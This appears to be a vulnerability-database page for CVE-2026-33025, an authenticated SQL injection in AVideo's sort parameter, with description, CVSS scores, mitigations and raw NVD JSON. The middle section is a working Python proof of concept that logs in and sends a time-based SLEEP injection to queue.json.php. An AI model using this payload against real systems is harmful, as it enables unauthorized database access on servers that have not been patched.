CVE-2026-33025

Description

AVideo is a video-sharing Platform. Versions prior to 8.0 contain a SQL Injection vulnerability in the getSqlFromPost() method of Object.php. The $_POST['sort'] array keys are used directly as SQL column identifiers inside an ORDER BY clause. Although real_escape_string() was applied, it only escapes string-context characters (quotes, null bytes) and provides no protection for SQL identifiers — making it entirely ineffective here. This issue has been fixed in version 8.0. To workaround this issue without upgrading, operators can apply a WAF rule to block POST requests where any sort[*] key contains characters outside [A-Za-z0-9_]. Alternatively, restrict access to the queue view (queue.json.php, index.php) to trusted IP ranges only.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo-encoder:*:*:*:*:*:*:*:* - VULNERABLE

AVideo < 8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: AVideo < 8.0 - SQL Injection (Authenticated)
# Date: 2026-03-20
# Exploit Author: Analyst
# Vendor Homepage: https://avideo.com/
# Software Link: https://github.com/WWBN/AVideo
# Version: < 8.0
# CVE: CVE-2026-33025

def exploit(url, username, password):
    session = requests.Session()
    # 1. Login (Assuming standard login endpoint)
    login_payload = {
        'user': username,
        'pass': password,
        'login': 'Login'
    }
    session.post(f"{url}/userLogin", data=login_payload)

    # 2. Send malicious payload to queue view
    # The vulnerability is in the 'sort' array keys in getSqlFromPost()
    # Injection point: ORDER BY [KEY]
    # Payload: IF(1=1,SLEEP(5),0)
    
    injection_payload = {
        'sort[IF(1=1,SLEEP(5),0)]': 'ASC'
    }
    
    response = session.post(f"{url}/queue.json.php", data=injection_payload)
    
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed! SQL Injection successful.")
    else:
        print("[-] Failed to confirm vulnerability.")

if __name__ == "__main__":
    target_url = "http://localhost/avideo"
    exploit(target_url, "admin", "password")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33025
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33025
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33025/
[4] VulDB https://vuldb.com/cve/CVE-2026-33025
[5] https://github.com/WWBN/AVideo-Encoder/commit/d1c8a17ac88b5e27da9dfb7a230bbaf54aa53124
[6] https://github.com/WWBN/AVideo-Encoder/security/advisories/GHSA-5qvj-5h75-27pj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33025", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:15.877", "lastModified": "2026-03-24T16:32:11.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo is a video-sharing Platform. Versions prior to 8.0 contain a SQL Injection vulnerability in the getSqlFromPost() method of Object.php. The $_POST['sort'] array keys are used directly as SQL column identifiers inside an ORDER BY clause. Although real_escape_string() was applied, it only escapes string-context characters (quotes, null bytes) and provides no protection for SQL identifiers — making it entirely ineffective here. This issue has been fixed in version 8.0. To workaround this issue without upgrading, operators can apply a WAF rule to block POST requests where any sort[*] key contains characters outside [A-Za-z0-9_]. Alternatively, restrict access to the queue view (queue.json.php, index.php) to trusted IP ranges only."}, {"lang": "es", "value": "AVideo es una plataforma para compartir videos. Las versiones anteriores a la 8.0 contienen una vulnerabilidad de inyección SQL en el método getSqlFromPost() de Object.php. Las claves del array $_POST['sort'] se utilizan directamente como identificadores de columna SQL dentro de una cláusula ORDER BY. Aunque se aplicó real_escape_string(), solo escapa caracteres de contexto de cadena (comillas, bytes nulos) y no proporciona protección para los identificadores SQL — lo que la hace completamente ineficaz aquí. Este problema se ha solucionado en la versión 8.0. Para solucionar este problema sin actualizar, los operadores pueden aplicar una regla de WAF para bloquear solicitudes POST donde cualquier clave sort[*] contenga caracteres fuera de [A-Za-z0-9_]. Alternativamente, restringir el acceso a la vista de cola (queue.json.php, index.php) solo a rangos de IP de confianza."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo-encoder:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0", "matchCriteriaId": "7838B812-EB07-43E4-B3F6-0887FB6CA33E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo-Encoder/commit/d1c8a17ac88b5e27da9dfb7a230bbaf54aa53124", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo-Encoder/security/advisories/GHSA-5qvj-5h75-27pj", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}